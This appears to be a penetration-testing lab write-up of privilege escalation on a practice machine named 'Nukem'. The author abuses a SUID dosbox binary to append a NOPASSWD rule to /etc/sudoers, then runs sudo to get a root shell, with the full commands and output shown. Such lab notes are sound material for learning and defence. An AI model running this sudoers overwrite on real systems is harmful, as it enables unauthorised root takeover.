InfoSec LAB

Nukem_Privilege_Escalation_2

Created: 2 min read

dosbox

Earlier attempt to escalate privileges via leveraging the SUID dosbox binary to overwrite the /etc/passwd file failed due to the system not spawning a shell session.

[http@nukem http]$ sudo
usage: sudo -h | -K | -k | -V
usage: sudo -v [-AknS] [-g group] [-h host] [-p prompt] [-u user]
usage: sudo -l [-AknS] [-g group] [-h host] [-p prompt] [-U user] [-u user]
            [command]
usage: sudo [-AbEHknPS] [-C num] [-D directory] [-g group] [-h host] [-p
            prompt] [-R directory] [-T timeout] [-u user] [VAR=value] [-i|-s]
            [<command>]
usage: sudo -e [-AknS] [-C num] [-D directory] [-g group] [-h host] [-p prompt]
            [-R directory] [-T timeout] [-u user] file ...

sudo exists in the target system. This would mean that I can attempt to overwrite the sudoers file

[http@nukem http]$ LFILE='/etc/sudoers'
[http@nukem http]$ /usr/bin/dosbox -c 'mount c /' -c "echo http ALL=(ALL) NOPASSWD: ALL >> sudoers >>c:$LFILE" -c exit
 
ALSA lib confmisc.c:767:(parse_card) cannot find card '0'
ALSA lib conf.c:4743:(_snd_config_evaluate) function snd_func_card_driver returned error: No such file or directory
ALSA lib confmisc.c:392:(snd_func_concat) error evaluating strings
ALSA lib conf.c:4743:(_snd_config_evaluate) function snd_func_concat returned error: No such file or directory
ALSA lib confmisc.c:1246:(snd_func_refer) error evaluating name
ALSA lib conf.c:4743:(_snd_config_evaluate) function snd_func_refer returned error: No such file or directory
ALSA lib conf.c:5231:(snd_config_expand) Evaluate error: No such file or directory
ALSA lib pcm.c:2660:(snd_pcm_open_noupdate) Unknown PCM default
DOSBox version 0.74-3
Copyright 2002-2019 DOSBox Team, published under GNU GPL.
---
CONFIG: Using default settings. Create a configfile to change them
MIXER:Can't open audio: No available audio device , running in nosound mode.
ALSA:Can't subscribe to MIDI port (65:0) nor (17:0)
MIDI:Opened device:none
SHELL:Redirect output to c:/etc/sudoers

Overwrite successful

[http@nukem simple-file-list]$ sudo -i
whoami
root
hostname
nukem
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:50:56:9e:97:60 brd ff:ff:ff:ff:ff:ff
    altname enp11s0
    inet 192.168.113.105/24 brd 192.168.113.255 scope global ens192
       valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:fe9e:9760/64 scope link 
       valid_lft forever preferred_lft forever

System Level compromise

Interactive Graph View

Backlinks